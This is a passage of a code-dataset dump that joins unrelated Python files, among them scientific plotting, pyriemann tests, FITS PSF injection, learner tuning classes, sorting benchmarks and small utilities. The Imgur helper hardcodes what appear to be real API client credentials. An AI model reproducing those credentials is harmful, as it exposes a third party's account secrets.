import Operation as opmod \nfrom ...Operation import Operation\n\nclass CSVToArray(Operation):\n \"\"\"\n Read a csv-formatted file into a numpy array.\n \"\"\"\n\n def __init__(self):\n input_names = ['path']\n output_names = ['array']\n super(CSVToArray, self).__init__(input_names, output_names)\n self.input_doc['path'] = \"path to .csv file\"\n self.output_doc['array'] = \"numpy array built from csv file contents\"\n\n def run(self):\n path = self.inputs['path']\n if path is None:\n return\n self.outputs['array'] = np.loadtxt(path, dtype=float, delimiter=',')\n\n\n","sub_path":"paws/core/operations/IO/CSV/CSVToArray.py","file_name":"CSVToArray.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"568628641","text":"from Looped_CV_Data import plot_looped_data\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\ndirectory = '/Users/st659/Google Drive/Cell Chamber Ref Test 02-12-16'\ndirectory2 = '/Users/st659/Google Drive/Cell 1 Reference Measurement'\nvoltage_list, current_list =plot_looped_data(directory)\n\n\nmax_current_list = list()\nmax_voltage_list = list()\nfor current, voltage in zip(current_list, voltage_list):\n max_current = max(current)\n max_current_arg = np.argmax(current)\n max_current_list.append(max_current)\n max_voltage_list.append(voltage[max_current_arg])\n\ntime_points = np.linspace(0,len(max_current_list)*10, num=len(max_current_list))\nplt.style.use(['seaborn-white','seaborn-poster'])\nfig = plt.figure()\nax = fig.add_subplot(111)\nfor volt, curr in zip(voltage_list, current_list):\n ax.plot(volt,curr)\nax.set_xlabel('Voltage (V)')\nax.set_ylabel('Current (mA)')\nax.set_title('Cyclic Voltammetry of On Chip Electrode Array of 100 $\\mu$M Methylene Blue over 6 Hours', y=1.04)\n#plt.savefig(os.path.join(directory,'CV On Chip MB 28-11-16 300dpi.png'), dpi=300)\nfig2 = plt.figure()\nax2 = fig2.add_subplot(111)\nax3 = ax2.twinx()\n\n\ntime= list()\nfor num in time_points:\n time.append(num)\n\n\nax2.plot(time, max_current_list, label='Current')\n\nax3.plot(time, max_voltage_list, color='r', label='Voltage')\n\n\naverage_voltage = np.full(( len(max_voltage_list),1),np.mean(max_voltage_list,axis=0))\nstd_dev_1 = np.full((len(max_voltage_list),1), np.mean(max_voltage_list,axis=0) + np.std(max_voltage_list,axis=0))\nstd_dev_2 = np.full((len(max_voltage_list),1), np.mean(max_voltage_list,axis=0) - np.std(max_voltage_list,axis=0))\nprint(len(average_voltage))\nax3.plot(time, average_voltage, color='g', linestyle='--')\nax3.plot(time, std_dev_1, color='k', linestyle='--')\nax3.plot(time, std_dev_2, color='k', linestyle='--')\n\nprint(np.mean(max_voltage_list,axis=0))\nprint(np.std(max_voltage_list,axis=0))\nprint(max_voltage_list)\nax2.set_title('Maximum Current and Corresponding Voltage of CV of 100 $\\mu$M Methylene Blue over 6 Hours', y=1.04)\nax2.set_xlabel('Time (Mins)')\nax2.set_ylabel('Current (mA)')\nax3.set_ylabel('Voltage (V)')\nax2.legend(loc=(0.1,0.15))\nax3.legend(loc=(0.1,0.1))\n#plt.savefig(os.path.join(directory,'Max current On Chip MB 28-11-16 300dpi.png'), dpi=300)\nplt.show()","sub_path":"Cell Ref Test 6-12-16.py","file_name":"Cell Ref Test 6-12-16.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80555764","text":"import numpy as np\nimport pytest\nfrom pytest import approx\nfrom pyriemann.utils.mean import (\n mean_riemann,\n mean_euclid,\n 
mean_logeuclid,\n mean_logdet,\n mean_ale,\n mean_identity,\n mean_covariance,\n mean_kullback_sym,\n mean_harmonic,\n mean_wasserstein,\n mean_alm,\n)\nfrom pyriemann.utils.geodesic import geodesic_riemann\n\n\ndef generate_cov(n_trials, n_channels):\n \"\"\"Generate a set of cavariances matrices for test purpose\"\"\"\n rs = np.random.RandomState(1234)\n diags = 2.0 + 0.1 * rs.randn(n_trials, n_channels)\n A = 2 * rs.rand(n_channels, n_channels) - 1\n A /= np.linalg.norm(A, axis=1)[:, np.newaxis]\n covmats = np.empty((n_trials, n_channels, n_channels))\n for i in range(n_trials):\n covmats[i] = A @ np.diag(diags[i]) @ A.T\n return covmats, diags, A\n\n\n@pytest.mark.parametrize(\n \"mean\",\n [\n mean_riemann,\n mean_logeuclid,\n mean_euclid,\n mean_identity,\n mean_logdet,\n mean_ale,\n mean_kullback_sym,\n mean_harmonic,\n mean_wasserstein,\n ],\n)\ndef test_mean_shape(mean):\n \"\"\"Test the shape of mean\"\"\"\n n_trials, n_channels = 5, 3\n covmats, _, A = generate_cov(n_trials, n_channels)\n C = mean(covmats)\n assert C.shape == (n_channels, n_channels)\n\n\n@pytest.mark.parametrize(\"mean\", [mean_riemann, mean_logdet])\ndef test_mean_shape_with_init(mean):\n \"\"\"Test the shape of mean with init\"\"\"\n n_trials, n_channels = 5, 3\n covmats, _, A = generate_cov(n_trials, n_channels)\n C = mean(covmats, init=covmats[0])\n assert C.shape == (n_channels, n_channels)\n\n\n@pytest.mark.parametrize(\"init\", [True, False])\ndef test_riemann_mean(init):\n \"\"\"Test the riemannian mean\"\"\"\n n_trials, n_channels = 100, 3\n covmats, diags, A = generate_cov(n_trials, n_channels)\n if init:\n C = mean_riemann(covmats, init=covmats[0])\n else:\n C = mean_riemann(covmats)\n Ctrue = np.exp(np.log(diags).mean(0))\n Ctrue = A @ np.diag(Ctrue) @ A.T\n assert C == approx(Ctrue)\n\n\ndef test_euclid_mean():\n \"\"\"Test the euclidean mean\"\"\"\n n_trials, n_channels = 100, 3\n covmats, _, _ = generate_cov(n_trials, n_channels)\n C = mean_euclid(covmats)\n assert C == approx(covmats.mean(axis=0))\n\n\ndef test_identity_mean():\n \"\"\"Test the identity mean\"\"\"\n n_trials, n_channels = 100, 3\n covmats, _, _ = generate_cov(n_trials, n_channels)\n C = mean_identity(covmats)\n assert np.all(C == np.eye(n_channels))\n\n\ndef test_alm_mean():\n \"\"\"Test the ALM mean\"\"\"\n n_trials, n_channels = 3, 3\n covmats, _, _ = generate_cov(n_trials, n_channels)\n C_alm = mean_alm(covmats)\n C_riem = mean_riemann(covmats)\n assert C_alm == approx(C_riem)\n\n\ndef test_alm_mean_maxiter():\n \"\"\"Test the ALM mean with max iteration\"\"\"\n n_trials, n_channels = 3, 3\n covmats, _, _ = generate_cov(n_trials, n_channels)\n C = mean_alm(covmats, maxiter=1, verbose=True) # maxiter reached\n assert C.shape == (n_channels, n_channels)\n\n\ndef test_alm_mean_2trials():\n \"\"\"Test the ALM mean with 2 trials\"\"\"\n n_trials, n_channels = 2, 3\n covmats, _, _ = generate_cov(n_trials, n_channels)\n C = mean_alm(covmats) # n_trials=2\n assert np.all(C == geodesic_riemann(covmats[0], covmats[1], alpha=0.5))\n\n\n@pytest.mark.parametrize(\n \"metric, mean\",\n [\n (\"riemann\", mean_riemann),\n (\"logdet\", mean_logdet),\n (\"logeuclid\", mean_logeuclid),\n (\"euclid\", mean_euclid),\n (\"alm\", mean_alm),\n (\"identity\", mean_identity),\n (\"wasserstein\", mean_wasserstein),\n (\"ale\", mean_ale),\n (\"harmonic\", mean_harmonic),\n (\"kullback_sym\", mean_kullback_sym),\n ],\n)\ndef test_mean_covariance_metric(metric, mean):\n \"\"\"Test mean_covariance for metric\"\"\"\n n_trials, n_channels = 3, 3\n covmats, 
_, _ = generate_cov(n_trials, n_channels)\n C = mean_covariance(covmats, metric=metric)\n Ctrue = mean(covmats)\n assert np.all(C == Ctrue)\n","sub_path":"tests/test_utils_mean.py","file_name":"test_utils_mean.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"500622627","text":"#!python\n# -*- coding: utf-8 -*-#\n\"\"\"\nAdd given psf to random places of a cluster.\n\n@author: Bhishan Poudel\n\n@date: Feb 14, 2018\n\n\"\"\"\n# Imports\nimport os, sys\nimport numpy as np\nimport random\nfrom astropy import wcs\nfrom astropy.io import fits\nfrom astropy.io.fits import getheader\n\ndef add_psf_to_cluster(EXPTIME,n_psf,psf,cluster,o_cluster):\n \n # Read psf\n psf_hdu = fits.open(psf)\n\n # Read cluster\n cluster_hdu = fits.open(cluster)\n cluster_hdu[0].data = cluster_hdu[0].data/EXPTIME\n\n # shape\n # NOTE: NAXIS = 2 means data has two axes\n NAXIS1p = getheader(psf)['NAXIS1'] # eg. 4000\n NAXIS1c = getheader(cluster)['NAXIS1'] \n # print(\"NAXIS1p = {}\".format(NAXIS1p))\n # print(\"NAXIS1c = {}\".format(NAXIS1c))\n\n # Assert fitsfiles are square shaped\n assert NAXIS1p == psf_hdu[0].data.shape[0] == psf_hdu[0].data.shape[1]\n assert NAXIS1c == cluster_hdu[0].data.shape[0] == cluster_hdu[0].data.shape[1]\n\n\n # Randomly put psf inside the cluster\n for i in range(0,n_psf):\n x = random.randint(NAXIS1p,NAXIS1c-NAXIS1p)\n y = random.randint(NAXIS1p,NAXIS1c-NAXIS1p)\n cluster_hdu[0].data[y:y+NAXIS1p, x:x+NAXIS1p] += psf_hdu[0].data\n\n # Get fake wcs from astropy\n w = wcs.WCS(naxis=2)\n w.wcs.crpix = [1800.0, 1800.0]\n w.wcs.crval = [0.1, 0.1]\n w.wcs.cdelt = np.array([-5.55555555555556E-05,5.55555555555556E-05])\n w.wcs.ctype = [\"RA---TAN\", \"DEC--TAN\"]\n wcs_hdr = w.to_header()\n \n # Add fake wcs to header of output file\n hdr = cluster_hdu[0].header\n hdr += wcs_hdr\n \n # Add exptime\n hdr['EXPTIME'] = EXPTIME\n cluster_hdu[0].header = hdr\n\n # Write output file\n cluster_hdu.writeto(o_cluster,clobber=True)\n cluster_hdu.close()\n psf_hdu.close()\n \n # Print\n print('{} PSFs added to the galaxy cluster: {}'.format(n_psf,o_cluster))\n\ndef main():\n \"\"\"Run main function.\"\"\"\n \n # variables\n EXPTIME = 6000.0\n n_psf = 200\n\n # psf and cluster\n psf = '../psf/psf_LSST20000.fits'\n psf = '../../psfb.fits'\n cluster = '../data/lsst_z0.7_0.fits'\n o_cluster = '../edited_data/wcs_psf_' + os.path.basename(cluster)\n \n add_psf_to_cluster(EXPTIME,n_psf,psf,cluster,o_cluster) \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/add_psf_wcs.py","file_name":"add_psf_wcs.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"225698804","text":"from __future__ import division\nfrom settings import *\nfrom tuner import *\nfrom scikitlearners2 import *\nfrom sklearn.grid_search import ParameterGrid\n\n# __author__ = 'Wei'\n\nclass Learner(object):\n def __init__(i, train, tune, test):\n i.train = train\n i.tune = tune\n i.test = test\n\n def untuned(i):\n The.data.predict = i.test\n The.data.train = [i.train, i.tune]\n i.default()\n The.option.tuning = False\n score = i.call()\n return score\n\n def tuned(i):\n The.data.predict = i.tune\n The.data.train = i.train\n The.option.tuning = True\n i.optimizer()\n The.option.tuning = False\n The.data.predict = i.test\n score = i.call()\n return score\n\n def gridsearch(i):\n The.data.predict = i.tune\n The.data.train = i.train\n 
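# grid search: score every combination from grid_parameters() on the tuning split, then refit the best on the test split\n        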
The.option.tuning = True\n score_all = []\n param_grids = ParameterGrid(i.grid_parameters()[0])\n for each in param_grids:\n i.default(**each)\n score_all.append(i.call()[-1][The.option.tunedobjective]) # the last one is the list for defective score\n param_best = param_grids[score_all.index(max(score_all))]\n print(\"GridSearch Best Parameters: \", str(param_best))\n writefile(\"GridSearch Best Parameters: \"+str(param_best))\n The.option.tuning = False\n The.data.predict = i.test\n i.default(**param_best)\n score = i.call()\n return score\n\n def call(i):\n raise NotImplementedError\n\n def optimizer(i):\n raise NotImplementedError\n\n def default(i):\n raise NotImplementedError\n\n\nclass Where(Learner):\n def __init__(i, train, tune, predict):\n super(Where, i).__init__(train, tune, predict)\n i.tunelst = [\"The.tree.infoPrune\", \"The.tree.min\", \"The.option.threshold\",\n \"The.where.wriggle\", \"The.where.depthMax\",\n \"The.where.depthMin\", \"The.option.minSize\", \"The.tree.prune\",\n \"The.where.prune\"]\n i.tune_min = [0.01, 1, 0.01, 0.01, 1, 1, 0.01, True, False]\n i.tune_max = [1, 10, 1, 1, 20, 6, 1, True, False]\n\n def default(i, info_prune=0.33, threshold=0.5, min=4, min_size=0.5,\n depth_min=2, depth_max=10, wriggle=0.2, where_prune=False,\n tree_prune=True):\n The.option.baseLine = True\n The.tree.infoPrune = info_prune\n The.option.threshold = threshold\n The.tree.min = min\n The.option.minSize = min_size # min leaf size\n The.where.depthMin = depth_min # no pruning till this depth\n The.where.depthMax = depth_max # max tree depth\n The.where.wriggle = wriggle # set this at init()\n The.where.prune = where_prune # pruning enabled?\n The.tree.prune = tree_prune\n\n def grid_parameters(self):\n return [{'info_prune': [0.01, 0.33, 0.99], 'threshold': [0.01, 0.5, 1],\n 'min': [1, 5, 10], 'min_size': [0.01, 0.5, 1.0],\n 'depth_min': [1, 3, 6], 'depth_max': [1, 10, 20],\n 'wriggle': [0.01, 0.5, 1.0], 'where_prune': [False, True],\n 'tree_prune': [False, True]}]\n\n def call(i): return main()\n\n def optimizer(i):\n tuner = WhereDE(i)\n tuner.DE()\n\n\nclass CART(Learner):\n def __init__(i, train, tune, predict):\n super(CART, i).__init__(train, tune, predict)\n i.tunelst = [\"The.cart.max_features\", \"The.cart.max_depth\",\n \"The.cart.min_samples_split\", \"The.cart.min_samples_leaf\",\n \"The.option.threshold\"]\n i.tune_min = [0.01, 1, 2, 1, 0.01]\n i.tune_max = [1, 50, 20, 20, 1]\n\n def default(i, max_features=None, max_depth=None, min_samples_split=2,\n min_samples_leaf=1, threshold=0.5):\n The.cart.max_features = max_features\n The.cart.max_depth = max_depth\n The.cart.min_samples_split = min_samples_split\n The.cart.min_samples_leaf = min_samples_leaf\n The.option.threshold = threshold\n\n def grid_parameters(self):\n return [{'max_features': [0.01, 0.15, 0.5, 0.75, 0.99], 'max_depth': [1, 13, 25, 37,50],\n 'min_samples_split': [1, 6,11,16, 20],\n 'min_samples_leaf': [2, 5,6,15, 20], 'threshold': [0.01, 0.25, 0.5,0.75, 1.0]}]\n\n def call(i):\n return cart()\n\n def optimizer(i):\n tuner = CartDE(i)\n tuner.DE()\n\n\nclass RF(Learner):\n def __init__(i, train, tune, predict):\n super(RF, i).__init__(train, tune, predict)\n i.tunelst = [\"The.rf.min_samples_split\", \"The.rf.min_samples_leaf \",\n \"The.rf.max_leaf_nodes\", \"The.rf.n_estimators\",\n \"The.rf.max_features\", \"The.option.threshold\"]\n i.tune_min = [1, 2, 10, 50, 0.01, 0.01]\n i.tune_max = [20, 20, 50, 150, 1, 1]\n i.default_value = [2, 1, None, 100, \"auto\", 0.5]\n\n def default(i, threshold=0.5, 
max_features=\"auto\", min_samples_split=2,\n min_samples_leaf=1, max_leaf_nodes=None, n_estimators=100):\n # for key,val in zip(i.tunelst,i.default_value):\n # setattr(key[],key[4:],val)\n # pdb.set_trace()\n The.option.threshold = threshold\n The.rf.max_features = max_features\n The.rf.min_samples_split = min_samples_split\n The.rf.min_samples_leaf = min_samples_leaf\n The.rf.max_leaf_nodes = max_leaf_nodes\n The.rf.n_estimators = n_estimators\n\n def grid_parameters(self):\n return [\n {'n_estimators': [50, 75,100,125, 150], 'max_features': [0.01, 0.15, 0.50, 0.75, 0.99],\n 'min_samples_split': [1, 5,10,15, 21], 'min_samples_leaf': [2,7, 12,16, 21],\n 'max_leaf_nodes': [10, 20,30, 40, 50], 'threshold': [0.01, 0.25, 0.5, 0.75,1.0]}]\n\n def call(i):\n return rf()\n\n # class RF_classifier(RF):\n # def __init__(i,train,tune,predict):\n # super(RF_classifier, i).__init__(train,tune,predict)\n #\n # def call(i): return rf_classifier()\n\n\n def optimizer(i):\n tuner = RfDE(i)\n tuner.DE()\n","sub_path":"version1.0/learner.py","file_name":"learner.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"369444057","text":"from imgurpython import ImgurClient\n\nclient_id = '8556f6df75eac4b'\nclient_secret = '928e713a1e23dfaaaea3bd60aefdde0950f023dc'\n\nclient = ImgurClient(client_id, client_secret)\n\ndef get_imgur_data(img_id):\n data = client.get_image(img_id)\n return data.width, data.height, data.mp4, img_id\n\n#get_imgur_data('NGVCfd0')\n","sub_path":"earth/imgur_api.py","file_name":"imgur_api.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"630655697","text":"# use timeit to measure duration of different\n# sorting functions with varied input lengths\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom .algs import quicksort, bubblesort\n\ndef time_alg(a):\n times = []\n # range of lengths to test is 100, 200, ... 
1000\n for n in range(100,1100,100):\n # create a set of 100 random vectors of that size\n x = [ np.random.randint(100,size=n) ]*100\n t0 = time.time()\n sorted = [ a(e) for e in x ]\n t1 = time.time()\n print(\"100 vectors of length %s: %s sec\" % (n, t1-t0))\n times.append(t1-t0)\n return times\n\ndef time_test():\n print(\"** Timing test for Bubblesort and Quicksort **\")\n print(\"- BUBBLESORT -\")\n bt = time_alg(bubblesort)\n print(\"\")\n print(\"- QUICKSORT -\")\n qt = time_alg(quicksort)\n print(\"\")\n print(\"** end **\")\n return bt,qt\n\ndef time_graphs(bt,qt):\n x = [ n for n in range(100,1100,100)]\n x2 = [ n for n in range(100,1001,1)]\n n2 = [ (n**2)/40000 for n in x2 ]\n nlogn = [ (n*np.log2(n))/2000 for n in x2 ]\n\n ## make graphs, save to png\n fig3,ax3 = plt.subplots(figsize=(9,6))\n ax3.scatter(x,bt,label='bubblesort')\n ax3.scatter(x,qt,marker=\"s\",label='quicksort')\n ax3.plot(x2,nlogn,color=\"black\",label=\"C*NlogN\")\n ax3.plot(x2,n2,color=\"black\",linestyle=\"--\",label=\"C*N^2\")\n ax3.set_xlabel(\"Length N of Input Vector\")\n ax3.set_ylabel(\"Time to Sort 100 Vectors (seconds)\")\n ax3.set_title('Timing Comparison, Linear Scale')\n ax3.legend()\n plt.savefig(\"fig3.png\",bbox_inches=\"tight\")\n\n fig4,ax4 = plt.subplots(figsize=(9,6))\n ax4.set_yscale('log')\n ax4.scatter(x,bt,label='bubblesort')\n ax4.scatter(x,qt,label='quicksort')\n ax4.plot(x2,nlogn,color=\"gray\",label='C*NlogN')\n ax4.plot(x2,n2,color=\"gray\",linestyle=\"--\",label='C*N^2')\n ax4.set_xlabel(\"Length N of Input Vector\")\n ax4.set_ylabel(\"Time to Sort 100 Vectors (seconds)\")\n ax4.set_title('Timing Comparison, Log Scale')\n ax4.legend()\n plt.savefig(\"fig4.png\",bbox_inches=\"tight\")\n","sub_path":"hw1/hw1/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501237073","text":"def findWaitingTime(processes, n, bt, wt):\n\n wt[0] = 0\n for i in range(1, n):\n wt[i] = bt[i - 1] + wt[i - 1]\n\n\ndef findavgTime(processes, n, bt):\n wt = [0] * n\n total_wt = 0\n\n findWaitingTime(processes, n, bt, wt)\n\n print(\"Processes Burst time \" + \" Waiting time \")\n\n for i in range(n):\n total_wt = total_wt + wt[i]\n print(\" \" + str(i + 1) + \"\\t\\t\\t\" +\n str(bt[i]) + \"\\t\\t\\t \" +\n str(wt[i]))\n\n print(\" Total waiting time = \" + str(total_wt))\n print(\"Average waiting time = \" + str(total_wt / n))\n\n\nif __name__ == \"__main__\":\n processes = [1, 2, 3]\n n = len(processes)\n\n burst_time = [15, 9, 11]\n findavgTime(processes, n, burst_time)","sub_path":"DataStruct/SJF.py","file_name":"SJF.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"169322969","text":"# Dice simulation\nfrom pygal import Bar\nfrom die import Die\n\ndef main():\n # Set the dice up\n numSides = 20\n die1 = Die(numSides)\n die2 = Die(numSides)\n\n numRolls = 100000\n\n # Roll the die numRoll times and store the sum of the two.\n results = []\n\n for roll in range(numRolls):\n result = die1.roll() + die2.roll()\n results.append(result)\n\n # Anaylizing the results from above.\n frequencies = []\n\n maxResult = die1.numSides + die2.numSides\n for value in range(2, maxResult+1):\n frequency = results.count(value)\n frequencies.append(frequency)\n\n # Create a graph from the results.\n graph = Bar()\n\n graph.title = f'Results of rolling two D{numSides} die {numRolls} times.'\n\n # Create 
the x labels\n graph.x_labels = []\n for x in range(2, maxResult+1):\n graph.x_labels.append(f'{x}')\n\n # Add axii titles.\n graph.x_title = 'Result'\n graph.y_title = 'Frequency of Result'\n\n graph.add(f'D{numSides} + D{numSides}', frequencies) # Add teh frequencies to the graph\n\n # Create the visual file.\n graph.render_to_file(f'd{numSides}_dice_simulation.svg')\n\nif __name__ == '__main__':\n main()","sub_path":"DiceSimulation/AdvPy_2021_DiceRollSimulation_main.py","file_name":"AdvPy_2021_DiceRollSimulation_main.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258258665","text":"from datetime import datetime\nimport pyexcel_io\n\nclass Manifest:\n def __init__(self, file_name):\n self.file_name = file_name\n self.time_created = datetime.now().time()\n self.date_created = datetime.now().date()\n self.all_entries = []\n\n def index_entry(self, index, file_name, base_dir, folder_struct):\n entry = [index, file_name, base_dir, folder_struct]\n self.all_entries.append(entry)\n\n def write_to_csv(self):\n # sheet = pyexcel.Sheet(self.all_entries)\n pyexcel_io.save_data(self.file_name, self.all_entries)\n\n def read_index(self, index_requested):\n if index_requested < 1:\n return []\n index_data = pyexcel_io.get_data(self.file_name)\n for current_index in index_data:\n if current_index[0] == str(index_requested):\n return current_index\n else:\n return []\n\n def return_all_data(self):\n index_data = pyexcel_io.get_data(self.file_name)\n return index_data\n\nclass Settings:\n def __init__(self):\n pass\n\ndef main():\n print(\"Testing Manifest Class...\")\n old_manifest = Manifest(\"manifest.csv\")\n old_manifest.index_entry(1, \"boop\", \"G:\\\\\", \"folder_name\")\n old_manifest.index_entry(2, \"bap\", \"G:\\\\\", \"folder_name2\")\n old_manifest.write_to_csv()\n print(old_manifest.read_index(1))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"61975944","text":"#Santiago Landaverde\r\n#1856681\r\n\r\nfrom datetime import date\r\n\r\ndef find_age(currentDate, birthDate):\r\n today = currentDate\r\n age = today.year - birthDate.year - ((today.month, today.day) < (birthDate.month, birthDate.day))\r\n return age\r\n\r\nprint(\"Birthday Calculator\")\r\nprint('Current Day')\r\n\r\nmonth = int(input('Month: '))\r\nday = int(input('Day: '))\r\nyear = int(input('Year: '))\r\n\r\nprint('Birthday')\r\n\r\nbirthday_month = int(input('Month: '))\r\nbirthday = int(input('Day: '))\r\nbirth_year = int(input('Year: '))\r\n\r\nprint(\"You are \", find_age(date(year, month, day), date(birth_year, birthday_month, birthday)), \"years old\")\r\nif day == birthday and month == birthday_month:\r\n print(\"Happy Birthday!\")","sub_path":"Homework_1/Coding_Problem_1.py","file_name":"Coding_Problem_1.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"353928777","text":"# File I/O (Input/Output)\n\nservices = {'ftp':21,'ssh':22,'smtp':25,'http':80}\n\nfp = open(\"./data/services.txt\", \"w+\")\n\n# write dict to file format : \n\nfor i in services:\n a = i + \": \" + str(services[i])\n fp.write(a)\n 
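# newline-terminate each service entry so the file holds one mapping per line\n    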
fp.write('\\n')\nfp.close()\n\n","sub_path":"0basics/firstTools/zipcracker/stream1/file_interaction.py","file_name":"file_interaction.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"372126990","text":"from bokeh.io import curdoc\nfrom pipeline_pyrenemofs import quantities, EXPLORE_URL\nimport panel as pn\n\nAIIDA_LOGO_PATH = \"detail_pyrenemofs/static/aiida-128.png\"\n\n\ndef get_mat_id():\n \"\"\"Get the material ID from URL parameter 'mat_id', or return one for testing.\"\"\"\n try:\n name = curdoc().session_context.request.arguments.get('mat_id')[0]\n if isinstance(name, bytes):\n mat_id = name.decode()\n except (TypeError, KeyError, AttributeError):\n mat_id = 'BOLZIN'\n\n return mat_id\n\n\ndef get_details_title(mat_node):\n \"\"\"Get title for the Detail page.\"\"\"\n title = \"# Detail section for {} ({} {}) v{}\".format(mat_node.extras['name_conventional'],\n mat_node.extras['class_material'].upper(), mat_node.label,\n mat_node.extras['workflow_version'])\n return title\n\n\ndef get_geom_table(zeopp):\n \"\"\"Make a table of geometric properties, given the Zeopp output.\n\n Note: for volumetric properties I use gravimetric/Dens because in some workflow version zeopp was not parsing them.\n \"\"\"\n # Usefull: ⁻¹²³⁴⁵⁶⁷⁸⁹⁰Å\n\n decimals = 2\n\n md_str = \"\"\"\n |||| \n |---|---|---|\n | Density | {} g/cm³ | |\n | Access. Surface Area | {} m²/g | {} m²/cm³ |\n | Non-Access. Surface Area | {} m²/g | {} m²/cm³ |\n | Access. Geom. Pore Volume | {} cm³/g | {} cm³/cm³ |\n | Access. Occup. Pore Volume | {} cm³/g | {} cm³/cm³ |\n | Non-Access. Occup. Pore Volume | {} cm³/g | {} cm³/cm³ |\n | Largest Free Sphere | {} Å | |\n | Largest Included Sphere | {} Å | |\n\n \"\"\".format(\n round(zeopp[\"Density\"], decimals),\n round(zeopp[\"ASA_m^2/g\"], decimals),\n round(zeopp[\"ASA_m^2/g\"] / zeopp[\"Density\"], decimals),\n round(zeopp[\"NASA_m^2/g\"], decimals),\n round(zeopp[\"NASA_m^2/g\"] / zeopp[\"Density\"], decimals),\n round(zeopp[\"AV_cm^3/g\"], decimals), # Remember: NAV geometric is meaningless!\n round(zeopp[\"AV_cm^3/g\"] / zeopp[\"Density\"], decimals),\n round(zeopp[\"POAV_cm^3/g\"], decimals),\n round(zeopp[\"POAV_cm^3/g\"] / zeopp[\"Density\"], decimals),\n round(zeopp[\"PONAV_cm^3/g\"], decimals),\n round(zeopp[\"PONAV_cm^3/g\"] / zeopp[\"Density\"], decimals),\n round(zeopp[\"Largest_free_sphere\"], decimals),\n round(zeopp[\"Largest_included_sphere\"], decimals),\n )\n return md_str\n\n\ndef get_provenance_url(uuid):\n \"\"\"Return URL to EXPLORE section for given uuid.\"\"\"\n return '{explore_url}/details/{uuid}'.format(explore_url=EXPLORE_URL, uuid=uuid)\n\n\ndef get_provenance_link(uuid, label=None):\n \"\"\"Return pn.HTML representation of provenance link.\"\"\"\n\n if label is None:\n label = \"Browse provenance\\n\" + uuid\n\n html_str = \"\"\\\n .format(link=get_provenance_url(uuid), label=label, logo_url=AIIDA_LOGO_PATH)\n\n return html_str\n\n\ndef get_title(text, uuid=None):\n \"\"\"Return pn.Row representation of title.\n\n Includes provenance link, if uuid is specified.\n \"\"\"\n if uuid is not None:\n text += get_provenance_link(uuid)\n title = pn.Row(pn.pane.HTML('
    {}
    '.format(text)), align='start')\n\n return title\n","sub_path":"detail_pyrenemofs/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548497857","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 1 16:24:02 2020\n\n@author: QuYue\n\"\"\"\n\n# -*- encoding: utf-8 -*-\n'''\n@Time :2020/09/01 13:29:42\n@Author :Qu Yue\n@File :get_result.py\n@Software :Visual Studio Code\nIntroduction: \n'''\n\n#%%\nimport record\nimport numpy as np\nimport matplotlib.pyplot as plt\n#%%\nfile_name = ['./result/e9_1-2020-09-01_13-15-34.pkl',\n './result/e9_1-2020-09-01_14-06-50.pkl',\n './result/e9_1-2020-09-01_14-27-14.pkl',\n './result/e9_1-2020-09-01_14-50-11.pkl',\n './result/e9_1-2020-09-01_15-13-06.pkl']\n\n#%%\nclass PARM:\n def __init__(self):\n self.dataset_ID = 1\n \ndef mean_std(vector, dim=None):\n vector = np.array(vector)\n if dim == None:\n m = vector.mean()\n n = vector.std()\n else:\n m = vector.mean(dim)\n n = vector.std(dim)\n return m, n\n \n\n\nnum = len(file_name)\nParm = []\n#%%\nfor name in file_name:\n Parm.append(record.read(name))\n \n#%%\n#for parm in Parm:\n# print(parm.random_seed)\n \n#%%\nlength = len(Parm[0].result['SoloNet'])\nAcc = np.empty([length, num])\nTotal = np.empty([length, num])\nfor i in range(num):\n parm = Parm[i]\n for j in range(length):\n Acc[j, i] = parm.result['SoloNet'][j]['Acc']\n Total[j, i] = parm.result['SoloNet'][j]['TotalAcc']\n\nprint(f\"SoloNetAcc: {mean_std(Acc, 1)}\")\nprint(f\"SoloNetTotal: {mean_std(Total, 1)}\")\n\n# %%\nOrigin = np.empty([num])\nfor i in range(num):\n parm = Parm[i]\n Origin[i] = max(parm.result['Origin']['origin'])\n\nprint(f\"Origin: {mean_std(Origin)}\")\n\n#%%\nFusionFineTune = np.empty([num])\nfor i in range(num):\n parm = Parm[i]\n FusionFineTune[i] = max(parm.result['FusionNet']['FusionFineTune'])\n\nprint(f\"FusionFineTune: {mean_std(FusionFineTune)}\")\n\n# %%\nFusionKD = np.empty([num])\nfor i in range(num):\n parm = Parm[i]\n FusionKD[i] = 